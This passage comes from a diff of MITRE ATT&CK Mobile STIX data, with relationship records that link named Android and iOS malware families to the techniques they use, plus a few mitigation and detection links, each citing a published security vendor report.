"target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a299e0a6-cada-4629-a6c6-ed73dc4422aa", + "type": "relationship", + "created": "2020-11-24T17:55:12.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.903Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has base64-encoded the exfiltrated data, replacing some of the base64 characters to further obfuscate the data.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2ebd5c4c-af03-4874-a6fd-1e58d51cc055", + "created": "2020-01-27T17:05:58.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:20.439Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can collect SMS messages.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4af26643-880f-4c34-a4a8-23e89b950c9d", + "created": "2019-09-04T15:38:56.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:18:38.582Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect the device calendars.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--93c20f43-6684-471c-910f-d9577f289677", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "In at least one case, [Stealth Mango](https://attack.mitre.org/software/S0328) may have been installed using physical access to the device by a repair shop.(Citation: Lookout-StealthMango)", + "modified": "2022-04-19T15:47:05.436Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8ed14c81-0b30-4bfc-8552-439aa0e920c3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted location information.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c264d954-8b5f-4be1-acf0-6387b7f04fae", + "type": "relationship", + "created": "2021-02-17T20:43:52.407Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.407Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has gathered the device manufacturer, model, and serial number.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8bc21e5d-b6bb-4c93-9419-19a12061de52", + "created": "2023-01-19T18:07:52.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:19:25.438Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can exfiltrate collected user data, including credentials and authorized cookies, via email.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) monitors for iOS devices connected via USB to an infected OSX computer and installs downloaded third-party applications or automatically generated malicious applications onto the device.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2cdd5474-620c-499e-8b9c-835505febc2c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:45.438Z", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eb784dcf-4188-47e2-9217-837b262acfb9", + "created": "2022-04-01T18:43:01.860Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-01T18:43:01.860Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c8d0d360-eb9e-4fb4-97a2-efaf6d4f1059", + "created": "2023-03-20T18:51:23.032Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:23.032Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dff37d8a-b7ca-409b-b4eb-581ca3a74bb5", + "created": "2020-04-08T15:41:19.445Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) can retrieve the C2 address from Twitter and Telegram.(Citation: Cofense Anubis)(Citation: Trend Micro Anubis)", + "modified": "2022-04-20T17:57:23.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ced70cea-b2ac-45b8-9f7d-779eedbdf06c", + "type": "relationship", + "created": "2020-01-27T17:05:58.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.273Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can record audio and phone calls.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--442dd700-2d7d-4cad-8282-9027e4f69133", + "created": "2022-03-30T20:31:41.927Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "New OS releases frequently contain additional limitations or controls around device location access.", + "modified": "2022-03-30T20:31:41.927Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--58c0fe4b-612d-4fc6-973f-16914b0f4b72", + "type": "relationship", + "created": "2020-11-24T17:55:12.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.900Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the device’s IMEI, phone number, and country.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6176a297-3097-42e2-b1c2-815e7fd8c81c", + "type": "relationship", + "created": "2020-01-21T15:29:27.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." + } + ], + "modified": "2020-01-21T15:29:27.041Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can download attacker-specified files.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7cf1c31-8722-4eeb-ae59-66936c15fa87", + "type": "relationship", + "created": "2021-01-05T20:16:20.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.495Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect device photos and credentials from other applications.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--972f0703-f4d7-42d2-8ca2-bec175dac0bf", + "type": "relationship", + "created": "2020-09-11T14:54:16.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.617Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect account information stored on the device.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--873b98de-d7cf-471b-9aa2-229eb03c9165", + "type": "relationship", + "created": "2020-09-15T15:18:12.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.459Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device information, including OS version and device model.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25655385-5b0d-4700-a59f-d5d043625b84", + "created": "2023-02-06T18:50:50.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:13:16.813Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can use rooting exploits to silently give itself permissions or install additional malware.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5ec3fcbb-d2ac-44ba-a2d4-99e7ddacf3a2", + "created": "2023-03-20T18:59:57.364Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:57.364Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b40e34ad-b699-4196-aa07-5bd71fe8f213", + "created": "2022-04-20T17:31:58.697Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) has exfiltrated data using FTP.(Citation: TrendMicro Coronavirus Updates)", + "modified": "2022-04-20T17:31:58.697Z", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--06348e22-9a06-4e4c-a57c-e438462e7fce", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.173Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record audio via the microphone when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--aa8e45c2-4276-451b-b1eb-59c396bf720a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + } + ], + "modified": "2019-10-10T15:18:51.154Z", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) executes Android root exploits.(Citation: Gooligan Citation)", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f9f892e-56ec-480b-aa40-337f20f2bb9c", + "type": "relationship", + "created": "2020-11-10T17:08:35.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.624Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can dynamically load additional functionality.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2359ad4b-b00b-4fd5-aef8-2d2be8bcf081", + "created": "2023-01-18T19:19:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:52:20.587Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use Accessibility Services to disable Google Play Protect.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f81a680-3151-4608-b83f-550756632013", + "type": "relationship", + "created": "2020-07-20T13:58:53.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 